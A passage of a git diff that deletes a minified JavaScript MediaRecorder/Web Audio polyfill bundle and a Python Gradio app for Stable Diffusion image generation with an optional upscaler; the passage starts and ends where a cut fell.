f[1]=="function"?f[1]:typeof f[1]=="object"&&f[1]!==null&&typeof f[1].handleEvent=="function"?f[1].handleEvent:null;if(p!==null){const g=h.get(f[1]);g!==void 0?f[1]=g:(f[1]=v=>{v.type==="error"?(Object.defineProperties(v,{type:{value:"processorerror"}}),p(v)):p(new ErrorEvent(f[0],{...v}))},h.set(p,f[1]))}}return w.call(l,"error",f[1],f[2]),w.call(l,...f)})(l.addEventListener),l.removeEventListener=(w=>(...f)=>{if(f[0]==="processorerror"){const p=h.get(f[1]);p!==void 0&&(h.delete(f[1]),f[1]=p)}return w.call(l,"error",f[1],f[2]),w.call(l,f[0],f[1],f[2])})(l.removeEventListener),d.numberOfOutputs!==0){const w=n(s,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});return l.connect(w).connect(s.destination),o(l,()=>w.disconnect(),()=>w.connect(s.destination))}return l}catch(l){throw l.code===11?r():l}if(u===void 0)throw r();return Ps(d),t(s,a,u,d)},Us=(e,t)=>e===null?512:Math.max(512,Math.min(16384,Math.pow(2,Math.round(Math.log2(e*t))))),Bs=e=>new Promise((t,n)=>{const{port1:r,port2:o}=new MessageChannel;r.onmessage=({data:s})=>{r.close(),o.close(),t(s)},r.onmessageerror=({data:s})=>{r.close(),o.close(),n(s)},o.postMessage(e)}),Ds=async(e,t)=>{const n=await Bs(t);return new e(n)},Ws=(e,t,n,r)=>{let o=dt.get(e);o===void 0&&(o=new WeakMap,dt.set(e,o));const s=Ds(n,r);return o.set(t,s),s},Vs=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>(m,w,f,p)=>{if(p.numberOfInputs===0&&p.numberOfOutputs===0)throw i();const g=Array.isArray(p.outputChannelCount)?p.outputChannelCount:Array.from(p.outputChannelCount);if(g.some(b=>b<1))throw i();if(g.length!==p.numberOfOutputs)throw t();if(p.channelCountMode!=="explicit")throw i();const v=p.channelCount*p.numberOfInputs,A=g.reduce((b,S)=>b+S,0),T=f.parameterDescriptors===void 0?0:f.parameterDescriptors.length;if(v+T>6||A>6)throw i();const _=new MessageChannel,E=[],y=[];for(let b=0;bb===void 0?0:b},maxValue:{get:()=>S===void 0?Ye:S},minValue:{get:()=>z===void 0?Ce:z}}),C.push(V)}const M=r(m,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"speakers",numberOfInputs:Math.max(1,v+T)}),I=Us(w,m.sampleRate),N=c(m,I,v+T,Math.max(1,A)),P=o(m,{channelCount:Math.max(1,A),channelCountMode:"explicit",channelInterpretation:"discrete",numberOfOutputs:Math.max(1,A)}),k=[];for(let b=0;b{const z=C[S];return z.connect(M,0,v+S),z.start(0),[b,z.offset]}));M.connect(N);let 
U=p.channelInterpretation,R=null;const x=p.numberOfOutputs===0?[N]:k,D={get bufferSize(){return I},get channelCount(){return p.channelCount},set channelCount(b){throw n()},get channelCountMode(){return p.channelCountMode},set channelCountMode(b){throw n()},get channelInterpretation(){return U},set channelInterpretation(b){for(const S of E)S.channelInterpretation=b;U=b},get context(){return N.context},get inputs(){return E},get numberOfInputs(){return p.numberOfInputs},get numberOfOutputs(){return p.numberOfOutputs},get onprocessorerror(){return R},set onprocessorerror(b){typeof R=="function"&&D.removeEventListener("processorerror",R),R=typeof b=="function"?b:null,typeof R=="function"&&D.addEventListener("processorerror",R)},get parameters(){return B},get port(){return _.port2},addEventListener(...b){return N.addEventListener(b[0],b[1],b[2])},connect:e.bind(null,x),disconnect:u.bind(null,x),dispatchEvent(...b){return N.dispatchEvent(b[0])},removeEventListener(...b){return N.removeEventListener(b[0],b[1],b[2])}},O=new Map;_.port1.addEventListener=(b=>(...S)=>{if(S[0]==="message"){const z=typeof S[1]=="function"?S[1]:typeof S[1]=="object"&&S[1]!==null&&typeof S[1].handleEvent=="function"?S[1].handleEvent:null;if(z!==null){const F=O.get(S[1]);F!==void 0?S[1]=F:(S[1]=V=>{d(m.currentTime,m.sampleRate,()=>z(V))},O.set(z,S[1]))}}return b.call(_.port1,S[0],S[1],S[2])})(_.port1.addEventListener),_.port1.removeEventListener=(b=>(...S)=>{if(S[0]==="message"){const z=O.get(S[1]);z!==void 0&&(O.delete(S[1]),S[1]=z)}return b.call(_.port1,S[0],S[1],S[2])})(_.port1.removeEventListener);let L=null;Object.defineProperty(_.port1,"onmessage",{get:()=>L,set:b=>{typeof L=="function"&&_.port1.removeEventListener("message",L),L=typeof b=="function"?b:null,typeof L=="function"&&(_.port1.addEventListener("message",L),_.port1.start())}}),f.prototype.port=_.port1;let W=null;Ws(m,D,f,p).then(b=>W=b);const he=je(p.numberOfInputs,p.channelCount),pe=je(p.numberOfOutputs,g),me=f.parameterDescriptors===void 0?[]:f.parameterDescriptors.reduce((b,{name:S})=>({...b,[S]:new Float32Array(128)}),{});let j=!0;const H=()=>{p.numberOfOutputs>0&&N.disconnect(P);for(let b=0,S=0;b{if(W!==null){const z=l(D);for(let F=0;F{Fe(b,me,V,v+$,F)});for(let V=0;V{if(z[ne].size>0)return Ie.set(ne,I/128),Y;const rt=Ie.get(ne);return rt===void 0?[]:(Y.every(or=>or.every(sr=>sr===0))&&(rt===1?Ie.delete(ne):Ie.set(ne,rt-1)),Y)});j=d(m.currentTime+F/m.sampleRate,m.sampleRate,()=>W.process(V,pe,me));for(let Y=0,ne=0;YN.connect(nt).connect(m.destination),Pt=()=>{N.disconnect(nt),nt.disconnect()},nr=()=>{if(j){Pt(),p.numberOfOutputs>0&&N.connect(P);for(let b=0,S=0;b{j&&(Lt(),H()),tt=!1};return Lt(),h(D,nr,rr)},Fs=(e,t)=>(n,r)=>{const o=n.createChannelMerger(r.numberOfInputs);return e!==null&&e.name==="webkitAudioContext"&&t(n,o),Me(o,r),o},js=e=>{const t=e.numberOfOutputs;Object.defineProperty(e,"channelCount",{get:()=>t,set:n=>{if(n!==t)throw Z()}}),Object.defineProperty(e,"channelCountMode",{get:()=>"explicit",set:n=>{if(n!=="explicit")throw Z()}}),Object.defineProperty(e,"channelInterpretation",{get:()=>"discrete",set:n=>{if(n!=="discrete")throw Z()}})},Sn=(e,t)=>{const n=e.createChannelSplitter(t.numberOfOutputs);return Me(n,t),js(n),n},$s=(e,t,n,r,o)=>(s,a)=>{if(s.createConstantSource===void 0)return n(s,a);const c=s.createConstantSource();return Me(c,a),Ct(c,a,"offset"),t(r,()=>r(s))||Mn(c),t(o,()=>o(s))||On(c),e(s,c),c},Rn=(e,t)=>(e.connect=t.connect.bind(t),e.disconnect=t.disconnect.bind(t),e),Gs=(e,t,n,r)=>(o,{offset:s,...a})=>{const 
c=o.createBuffer(1,2,44100),i=t(o,{buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1}),u=n(o,{...a,gain:s}),d=c.getChannelData(0);d[0]=1,d[1]=1,i.buffer=c,i.loop=!0;const l={get bufferSize(){},get channelCount(){return u.channelCount},set channelCount(w){u.channelCount=w},get channelCountMode(){return u.channelCountMode},set channelCountMode(w){u.channelCountMode=w},get channelInterpretation(){return u.channelInterpretation},set channelInterpretation(w){u.channelInterpretation=w},get context(){return u.context},get inputs(){return[]},get numberOfInputs(){return i.numberOfInputs},get numberOfOutputs(){return u.numberOfOutputs},get offset(){return u.gain},get onended(){return i.onended},set onended(w){i.onended=w},addEventListener(...w){return i.addEventListener(w[0],w[1],w[2])},dispatchEvent(...w){return i.dispatchEvent(w[0])},removeEventListener(...w){return i.removeEventListener(w[0],w[1],w[2])},start(w=0){i.start.call(i,w)},stop(w=0){i.stop.call(i,w)}},h=()=>i.connect(u),m=()=>i.disconnect(u);return e(o,i),r(Rn(l,u),h,m)},ae=(e,t)=>{const n=e.createGain();return Me(n,t),Ct(n,t,"gain"),n},zs=(e,{mediaStream:t})=>{const n=t.getAudioTracks();n.sort((s,a)=>s.ida.id?1:0);const r=n.slice(0,1),o=e.createMediaStreamSource(new MediaStream(r));return Object.defineProperty(o,"mediaStream",{value:t}),o},qs=e=>e===null?null:e.hasOwnProperty("OfflineAudioContext")?e.OfflineAudioContext:e.hasOwnProperty("webkitOfflineAudioContext")?e.webkitOfflineAudioContext:null,Hs=e=>(t,{disableNormalization:n,imag:r,real:o})=>{const s=r instanceof Float32Array?r:new Float32Array(r),a=o instanceof Float32Array?o:new Float32Array(o),c=t.createPeriodicWave(a,s,{disableNormalization:n});if(Array.from(r).length<2)throw e();return c},Tt=(e,t,n,r)=>e.createScriptProcessor(t,n,r),de=()=>new DOMException("","NotSupportedError"),Ys={disableNormalization:!1},Xs=(e,t,n,r)=>class In{constructor(s,a){const c=t(s),i=r({...Ys,...a}),u=e(c,i);return n.add(u),u}static[Symbol.hasInstance](s){return s!==null&&typeof s=="object"&&Object.getPrototypeOf(s)===In.prototype||n.has(s)}},Zs=(e,t)=>(n,r,o)=>(e(r).replay(o),t(r,n,o)),Ks=(e,t,n)=>async(r,o,s)=>{const a=e(r);await Promise.all(a.activeInputs.map((c,i)=>Array.from(c).map(async([u,d])=>{const h=await t(u).render(u,o),m=r.context.destination;!n(u)&&(r!==m||!n(r))&&h.connect(s,d,i)})).reduce((c,i)=>[...c,...i],[]))},Js=(e,t,n)=>async(r,o,s)=>{const a=t(r);await Promise.all(Array.from(a.activeInputs).map(async([c,i])=>{const d=await e(c).render(c,o);n(c)||d.connect(s,i)}))},Qs=(e,t,n,r)=>o=>e(wt,()=>wt(o))?Promise.resolve(e(r,r)).then(s=>{if(!s){const a=n(o,512,0,1);o.oncomplete=()=>{a.onaudioprocess=null,a.disconnect()},a.onaudioprocess=()=>o.currentTime,a.connect(o.destination)}return o.startRendering()}):new Promise(s=>{const a=t(o,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});o.oncomplete=c=>{a.disconnect(),s(c.renderedBuffer)},a.connect(o.destination),o.startRendering()}),ea=e=>(t,n)=>{e.set(t,n)},ta=e=>()=>{if(e===null)return!1;try{new e({length:1,sampleRate:44100})}catch{return!1}return!0},na=(e,t)=>async()=>{if(e===null)return!0;if(t===null)return!1;const n=new Blob(['class A extends AudioWorkletProcessor{process(i){this.port.postMessage(i,[i[0][0].buffer])}}registerProcessor("a",A)'],{type:"application/javascript; charset=utf-8"}),r=new t(1,128,44100),o=URL.createObjectURL(n);let s=!1,a=!1;try{await r.audioWorklet.addModule(o);const c=new 
e(r,"a",{numberOfOutputs:0}),i=r.createOscillator();c.port.onmessage=()=>s=!0,c.onprocessorerror=()=>a=!0,i.connect(c),i.start(0),await r.startRendering()}catch{}finally{URL.revokeObjectURL(o)}return s&&!a},ra=(e,t)=>()=>{if(t===null)return Promise.resolve(!1);const n=new t(1,1,44100),r=e(n,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});return new Promise(o=>{n.oncomplete=()=>{r.disconnect(),o(n.currentTime!==0)},n.startRendering()})},oa=()=>new DOMException("","UnknownError"),sa=()=>typeof window>"u"?null:window,aa=(e,t)=>n=>{n.copyFromChannel=(r,o,s=0)=>{const a=e(s),c=e(o);if(c>=n.numberOfChannels)throw t();const i=n.length,u=n.getChannelData(c),d=r.length;for(let l=a<0?-a:0;l+a{const a=e(s),c=e(o);if(c>=n.numberOfChannels)throw t();const i=n.length,u=n.getChannelData(c),d=r.length;for(let l=a<0?-a:0;l+at=>{t.copyFromChannel=(n=>(r,o,s=0)=>{const a=e(s),c=e(o);if(a(r,o,s=0)=>{const a=e(s),c=e(o);if(a(t,n)=>{const r=n.createBuffer(1,1,44100);t.buffer===null&&(t.buffer=r),e(t,"buffer",o=>()=>{const s=o.call(t);return s===r?null:s},o=>s=>o.call(t,s===null?r:s))},ua=(e,t)=>(n,r)=>{r.channelCount=1,r.channelCountMode="explicit",Object.defineProperty(r,"channelCount",{get:()=>1,set:()=>{throw e()}}),Object.defineProperty(r,"channelCountMode",{get:()=>"explicit",set:()=>{throw e()}});const o=n.createBufferSource();t(r,()=>{const c=r.numberOfInputs;for(let i=0;io.disconnect(r))},la=(e,t,n)=>e.copyFromChannel===void 0?e.getChannelData(n)[0]:(e.copyFromChannel(t,n),t[0]),Nt=(e,t,n,r)=>{let o=e;for(;!o.hasOwnProperty(t);)o=Object.getPrototypeOf(o);const{get:s,set:a}=Object.getOwnPropertyDescriptor(o,t);Object.defineProperty(e,t,{get:n(s),set:r(a)})},da=e=>({...e,outputChannelCount:e.outputChannelCount!==void 0?e.outputChannelCount:e.numberOfInputs===1&&e.numberOfOutputs===1?[e.channelCount]:Array.from({length:e.numberOfOutputs},()=>1)}),fa=e=>{const{imag:t,real:n}=e;return t===void 0?n===void 0?{...e,imag:[0,0],real:[0,0]}:{...e,imag:Array.from(n,()=>0),real:n}:n===void 0?{...e,imag:t,real:Array.from(t,()=>0)}:{...e,imag:t,real:n}},kn=(e,t,n)=>{try{e.setValueAtTime(t,n)}catch(r){if(r.code!==9)throw r;kn(e,t,n+1e-7)}},ha=e=>{const t=e.createBufferSource();t.start();try{t.start()}catch{return!0}return!1},pa=e=>{const t=e.createBufferSource(),n=e.createBuffer(1,1,44100);t.buffer=n;try{t.start(0,1)}catch{return!1}return!0},ma=e=>{const t=e.createBufferSource();t.start();try{t.stop()}catch{return!1}return!0},Ln=e=>{const t=e.createOscillator();try{t.start(-1)}catch(n){return n instanceof RangeError}return!1},ga=e=>{const t=e.createBuffer(1,1,44100),n=e.createBufferSource();n.buffer=t,n.start(),n.stop();try{return n.stop(),!0}catch{return!1}},Pn=e=>{const t=e.createOscillator();try{t.stop(-1)}catch(n){return n instanceof RangeError}return!1},wa=e=>{const{port1:t,port2:n}=new MessageChannel;try{t.postMessage(e)}finally{t.close(),n.close()}},va=e=>{e.start=(t=>(n=0,r=0,o)=>{const s=e.buffer,a=s===null?r:Math.min(s.duration,r);s!==null&&a>s.duration-.5/e.context.sampleRate?t.call(e,n,0,0):t.call(e,n,a,o)})(e.start)},_a=(e,t)=>{const n=t.createGain();e.connect(n);const r=(o=>()=>{o.call(e,n),e.removeEventListener("ended",r)})(e.disconnect);e.addEventListener("ended",r),Rn(e,n),e.stop=(o=>{let s=!1;return(a=0)=>{if(s)try{o.call(e,a)}catch{n.gain.setValueAtTime(0,a)}else o.call(e,a),s=!0}})(e.stop)},Oe=(e,t)=>n=>{const r={value:e};return Object.defineProperties(n,{currentTarget:r,target:r}),typeof 
t=="function"?t.call(e,n):t.handleEvent.call(e,n)},ya=eo(le),Ea=ao(le),Aa=Jo(qe),ba=new WeakMap,Ca=ls(ba),fe=jo(new Map,new WeakMap),Q=sa(),xn=us(q),Xe=Ks(q,xn,ue),ee=hs(pn),ve=qs(Q),J=As(ve),Un=new WeakMap,Bn=ss(Oe),Ze=Is(Q),Dn=vs(Ze),Wn=_s(Q),Ta=ys(Q),Ae=Ls(Q),Se=Po(to(ln),so(ya,Ea,mt,Aa,gt,q,Ca,be,X,le,se,ue,xe),fe,ws(ut,gt,q,X,Ee,se),ie,gs,de,Ko(mt,ut,q,X,Ee,ee,se,J),ts(Un,q,K),Bn,ee,Dn,Wn,Ta,J,Ae),Vn=new WeakSet,Qt=Os(Q),Fn=Yo(new Uint32Array(1)),jn=aa(Fn,ie),$n=ia(Fn),Na=lo(Vn,fe,de,Qt,ve,ta(Qt),jn,$n),Mt=io(ae),Gn=Js(xn,Te,ue),Ot=$o(Gn),Ke=Rs(Mt,fe,ha,pa,ma,Ln,ga,Pn,va,ca(Nt),_a),St=Zs(ds(Te),Gn),Ma=po(Ot,Ke,X,St,Xe),Je=xo(no(fn),Un,hn,Uo,Yr,Xr,Zr,Kr,Jr,at,cn,Ze,kn),Oa=ho(Se,Ma,Je,Z,Ke,ee,J,Oe),Sa=bo(Se,Co,ie,Z,ks(ae,Nt),ee,J,Xe),Qe=Ms(le,Wn),Ra=ua(Z,Qe),Rt=Fs(Ze,Ra),Ia=Gs(Mt,Ke,ae,Qe),Re=$s(Mt,fe,Ia,Ln,Pn),ka=Ho(Ot,Re,X,St,Xe),La=qo(Se,Je,ka,Re,ee,J,Oe),Pa=Qs(fe,ae,Tt,ra(ae,ve)),xa=To(Je,Rt,Re,Tt,de,la,J,Nt),zn=new WeakMap,Ua=Ns(Sa,xa,Bn,J,zn,Oe),Ba=Hs(ie);Xs(Ba,ee,new WeakSet,fa);const qn=bs(Q),It=as(Q),Hn=new WeakMap,Da=ps(Hn,ve),en=qn?oo(fe,de,os(Q),It,is(Qr),ee,Da,J,Ae,new WeakMap,new WeakMap,na(Ae,ve),Q):void 0,Wa=Es(Dn,J);Zo(Vn,fe,Xo,rs,new WeakSet,ee,Wa,ht,wt,jn,$n);const Va=Cs(Se,zs,ee,J),Yn=ms(zn),Fa=co(Yn),Xn=Go(ie),ja=Qo(Yn),Zn=ns(ie),Kn=new WeakMap,$a=cs(Kn,K),Ga=Vs(Xn,ie,Z,Rt,Sn,Re,ae,Tt,de,Zn,It,$a,Qe),za=xs(Z,Ga,ae,de,Qe),qa=Fo(Ot,Xn,Ke,Rt,Sn,Re,ae,ja,Zn,It,X,Ae,ve,St,Xe,Pa),Ha=fs(Hn),Ya=ea(Kn),tn=qn?Do(Fa,Se,Je,qa,za,q,Ha,ee,J,Ae,da,Ya,wa,Oe):void 0,Xa=Ts(Z,de,oa,Ua,Ze),Jn="Missing AudioWorklet support. Maybe this is not running in a secure context.",Za=async(e,t,n,r,o)=>{const{encoderId:s,port:a}=await on(o,t.sampleRate);if(tn===void 0)throw new Error(Jn);const c=new Oa(t,{buffer:e}),i=new Va(t,{mediaStream:r}),u=Gr(tn,t,{channelCount:n});return{audioBufferSourceNode:c,encoderId:s,mediaStreamAudioSourceNode:i,port:a,recorderAudioWorkletNode:u}},Ka=(e,t,n,r)=>(o,s,a)=>{var c;const i=(c=s.getAudioTracks()[0])===null||c===void 0?void 0:c.getSettings().sampleRate,u=new Xa({latencyHint:"playback",sampleRate:i}),d=Math.max(1024,Math.ceil(u.baseLatency*u.sampleRate)),l=new Na({length:d,sampleRate:u.sampleRate}),h=[],m=$r(C=>{if(en===void 0)throw new Error(Jn);return en(u,C)});let w=null,f=null,p=null,g=null,v=!0;const A=C=>{o.dispatchEvent(e("dataavailable",{data:new Blob(C,{type:a})}))},T=async(C,M)=>{const I=await Ue(C,M);p===null?h.push(...I):(A(I),g=T(C,M))},_=()=>(v=!0,u.resume()),E=()=>{p!==null&&(w!==null&&(s.removeEventListener("addtrack",w),s.removeEventListener("removetrack",w)),f!==null&&clearTimeout(f),p.then(async({constantSourceNode:C,encoderId:M,mediaStreamAudioSourceNode:I,recorderAudioWorkletNode:N})=>{g!==null&&(g.catch(()=>{}),g=null),await N.stop(),I.disconnect(N),C.stop();const P=await Ue(M,null);p===null&&await y(),A([...h,...P]),h.length=0,o.dispatchEvent(new Event("stop"))}),p=null)},y=()=>(v=!1,u.suspend());return y(),{get mimeType(){return a},get state(){return p===null?"inactive":v?"recording":"paused"},pause(){if(p===null)throw n();v&&(y(),o.dispatchEvent(new Event("pause")))},resume(){if(p===null)throw n();v||(_(),o.dispatchEvent(new Event("resume")))},start(C){var M;if(p!==null)throw n();if(s.getVideoTracks().length>0)throw r();o.dispatchEvent(new Event("start"));const I=s.getAudioTracks(),N=I.length===0?2:(M=I[0].getSettings().channelCount)!==null&&M!==void 
0?M:2;p=Promise.all([_(),m.then(()=>Za(l,u,N,s,a))]).then(async([,{audioBufferSourceNode:k,encoderId:B,mediaStreamAudioSourceNode:U,port:R,recorderAudioWorkletNode:x}])=>{U.connect(x),await new Promise(O=>{k.onended=O,k.connect(x),k.start(u.currentTime+d/u.sampleRate)}),k.disconnect(x);const D=new La(u,{offset:0});return D.onended=()=>D.disconnect(),D.connect(u.destination),D.start(),await x.record(R),C!==void 0&&(g=T(B,C)),{constantSourceNode:D,encoderId:B,mediaStreamAudioSourceNode:U,recorderAudioWorkletNode:x}});const P=s.getTracks();w=()=>{E(),o.dispatchEvent(new ErrorEvent("error",{error:t()}))},s.addEventListener("addtrack",w),s.addEventListener("removetrack",w),f=setInterval(()=>{const k=s.getTracks();(k.length!==P.length||k.some((B,U)=>B!==P[U]))&&w!==null&&w()},1e3)},stop:E}};class st{constructor(t,n=0,r){if(n<0||r!==void 0&&r<0)throw new RangeError;const o=t.reduce((d,l)=>d+l.byteLength,0);if(n>o||r!==void 0&&n+r>o)throw new RangeError;const s=[],a=r===void 0?o-n:r,c=[];let i=0,u=n;for(const d of t)if(c.length===0)if(d.byteLength>u){i=d.byteLength-u;const l=i>a?a:i;s.push(new DataView(d,u,l)),c.push(d)}else u-=d.byteLength;else if(ia?d.byteLength-i+a:d.byteLength;s.push(new DataView(d,0,l)),c.push(d)}this._buffers=c,this._byteLength=a,this._byteOffset=u,this._dataViews=s,this._internalBuffer=new DataView(new ArrayBuffer(8))}get buffers(){return this._buffers}get byteLength(){return this._byteLength}get byteOffset(){return this._byteOffset}getFloat32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getFloat32(0,n)}getFloat64(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.setUint8(4,this.getUint8(t+4)),this._internalBuffer.setUint8(5,this.getUint8(t+5)),this._internalBuffer.setUint8(6,this.getUint8(t+6)),this._internalBuffer.setUint8(7,this.getUint8(t+7)),this._internalBuffer.getFloat64(0,n)}getInt16(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.getInt16(0,n)}getInt32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getInt32(0,n)}getInt8(t){const[n,r]=this._findDataViewWithOffset(t);return n.getInt8(t-r)}getUint16(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.getUint16(0,n)}getUint32(t,n){return this._internalBuffer.setUint8(0,this.getUint8(t+0)),this._internalBuffer.setUint8(1,this.getUint8(t+1)),this._internalBuffer.setUint8(2,this.getUint8(t+2)),this._internalBuffer.setUint8(3,this.getUint8(t+3)),this._internalBuffer.getUint32(0,n)}getUint8(t){const[n,r]=this._findDataViewWithOffset(t);return 
n.getUint8(t-r)}setFloat32(t,n,r){this._internalBuffer.setFloat32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setFloat64(t,n,r){this._internalBuffer.setFloat64(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3)),this.setUint8(t+4,this._internalBuffer.getUint8(4)),this.setUint8(t+5,this._internalBuffer.getUint8(5)),this.setUint8(t+6,this._internalBuffer.getUint8(6)),this.setUint8(t+7,this._internalBuffer.getUint8(7))}setInt16(t,n,r){this._internalBuffer.setInt16(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1))}setInt32(t,n,r){this._internalBuffer.setInt32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setInt8(t,n){const[r,o]=this._findDataViewWithOffset(t);r.setInt8(t-o,n)}setUint16(t,n,r){this._internalBuffer.setUint16(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1))}setUint32(t,n,r){this._internalBuffer.setUint32(0,n,r),this.setUint8(t,this._internalBuffer.getUint8(0)),this.setUint8(t+1,this._internalBuffer.getUint8(1)),this.setUint8(t+2,this._internalBuffer.getUint8(2)),this.setUint8(t+3,this._internalBuffer.getUint8(3))}setUint8(t,n){const[r,o]=this._findDataViewWithOffset(t);r.setUint8(t-o,n)}_findDataViewWithOffset(t){let n=0;for(const r of this._dataViews){const o=n+r.byteLength;if(t>=n&&t(s,a,c,i)=>{const u=c.getAudioTracks(),d=[],l=u.length===0?void 0:u[0].getSettings().channelCount,h=new a(c,{mimeType:"audio/webm;codecs=pcm"}),m=u.length===0?void 0:u[0].getSettings().sampleRate;let w=null,f=()=>{};const p=A=>{s.dispatchEvent(e("dataavailable",{data:new Blob(A,{type:i})}))},g=async(A,T)=>{const _=await Ue(A,T);h.state==="inactive"?d.push(..._):(p(_),w=g(A,T))},v=()=>{h.state!=="inactive"&&(w!==null&&(w.catch(()=>{}),w=null),f(),f=()=>{},h.stop())};return h.addEventListener("error",()=>{v(),s.dispatchEvent(new ErrorEvent("error",{error:t()}))}),h.addEventListener("start",()=>s.dispatchEvent(new Event("start"))),{get mimeType(){return i},get state(){return h.state},pause(){return h.pause()},resume(){return h.resume()},start(A){if(c.getVideoTracks().length>0)throw n();if(h.state==="inactive"){if(m===void 0)throw new Error("The sampleRate is not defined.");let T=!1,_=!1,E=0,y=on(i,m);f=()=>{_=!0};const C=sn(h,"dataavailable")(({data:M})=>{E+=1,y=y.then(async({dataView:I=null,elementType:N=null,encoderId:P,port:k})=>{const B=await M.arrayBuffer();E-=1;const U=I===null?new st([B]):new st([...I.buffers,B],I.byteOffset);if(!T&&h.state==="recording"&&!_){const L=o(U,0);if(L===null)return{dataView:U,elementType:N,encoderId:P,port:k};const{value:W}=L;if(W!==172351395)return{dataView:I,elementType:N,encoderId:P,port:k};T=!0}const{currentElementType:R,offset:x,contents:D}=r(U,N,l),O=xk.postMessage(L,L.map(({buffer:W})=>W))),E===0&&(h.state==="inactive"||_)&&(Ue(P,null).then(L=>{p([...d,...L]),d.length=0,s.dispatchEvent(new Event("stop"))}),k.postMessage([]),k.close(),C()),{dataView:O,elementType:R,encoderId:P,port:k}})});A!==void 
0&&y.then(({encoderId:M})=>w=g(M,A))}h.start(100)},stop:v}},Qa=()=>typeof window>"u"?null:window,Qn=(e,t)=>{if(t>=e.byteLength)return null;const n=e.getUint8(t);if(n>127)return 1;if(n>63)return 2;if(n>31)return 3;if(n>15)return 4;if(n>7)return 5;if(n>3)return 6;if(n>1)return 7;if(n>0)return 8;const r=Qn(e,t+1);return r===null?null:r+8},ei=(e,t)=>n=>{const r={value:e};return Object.defineProperties(n,{currentTarget:r,target:r}),typeof t=="function"?t.call(e,n):t.handleEvent.call(e,n)},er=[],et=Qa(),ti=Er(et),tr=pr(ti),ni=Ka(tr,_t,vr,$e),kt=Nr(Qn),ri=Cr(kt),oi=Tr(kt),si=mr(ri,oi),ai=Ja(tr,_t,$e,si,kt),ii=wr(et),ci=br(et),ui=Ar(_t,$e),Ci=yr(ui,$e,ni,ai,er,gr(ii,ei),ci),Ti=()=>_r(et),Ni=async e=>{er.push(await hr(e))};export{Ci as MediaRecorder,Ti as isSupported,Ni as register}; -//# sourceMappingURL=module-447425fe.js.map diff --git a/spaces/Dagfinn1962/CPU/app1.py b/spaces/Dagfinn1962/CPU/app1.py deleted file mode 100644 index e0187f41896b19b1affe35dad87e73c625ebb299..0000000000000000000000000000000000000000 --- a/spaces/Dagfinn1962/CPU/app1.py +++ /dev/null @@ -1,40 +0,0 @@ -import gradio as gr -import torch -import numpy as np -import modin.pandas as pd -from PIL import Image -from diffusers import DiffusionPipeline, StableDiffusionLatentUpscalePipeline - -device = "cuda" if torch.cuda.is_available() else "cpu" -pipe = DiffusionPipeline.from_pretrained("dreamlike-art/dreamlike-photoreal-2.0", torch_dtype=torch.float16, safety_checker=None) -upscaler = StableDiffusionLatentUpscalePipeline.from_pretrained("stabilityai/sd-x2-latent-upscaler", torch_dtype=torch.float16) -upscaler = upscaler.to(device) -pipe = pipe.to(device) - -def genie (Prompt, negative_prompt, height, width, scale, steps, seed, upscale, upscale_prompt, upscale_neg, upscale_scale, upscale_steps): - generator = torch.Generator(device=device).manual_seed(seed) - if upscale == "Yes": - low_res_latents = pipe(Prompt, negative_prompt=negative_prompt, height=height, width=width, num_inference_steps=steps, guidance_scale=scale, generator=generator, output_type="latent").images - image = upscaler(prompt=upscale_prompt, negative_prompt=upscale_neg, image=low_res_latents, num_inference_steps=upscale_steps, guidance_scale=upscale_scale, generator=generator).images[0] - else: - image = pipe(Prompt, negative_prompt=negative_prompt, height=height, width=width, num_inference_steps=steps, guidance_scale=scale, generator=generator).images[0] - return image - -gr.Interface(theme='HaleyCH/HaleyCH_Theme', fn=genie, inputs=[gr.Textbox(label='Input field right under here(Prompt)'), - gr.Textbox(label='What You dont want (Negative Prompt)'), - gr.Slider(512, 1024, 768, step=128, label='Height'), - gr.Slider(512, 1024, 768, step=128, label='Width'), - gr.Slider(1, maximum=15, value=10, step=.25), - gr.Slider(25, maximum=100, value=50, step=25), - gr.Slider(minimum=1, step=1, maximum=9999999999999999, randomize=True), - gr.Radio(["Yes", "No"], label='Upscale?'), - gr.Textbox(label='Upscaler Prompt: Optional'), - gr.Textbox(label='Upscaler Negative Prompt: Both Optional And Experimental'), - gr.Slider(minimum=0, maximum=15, value=0, step=1, label='Upscale Guidance Scale'), - gr.Slider(minimum=5, maximum=25, value=5, step=5, label='Upscaler Iterations') - - ], - 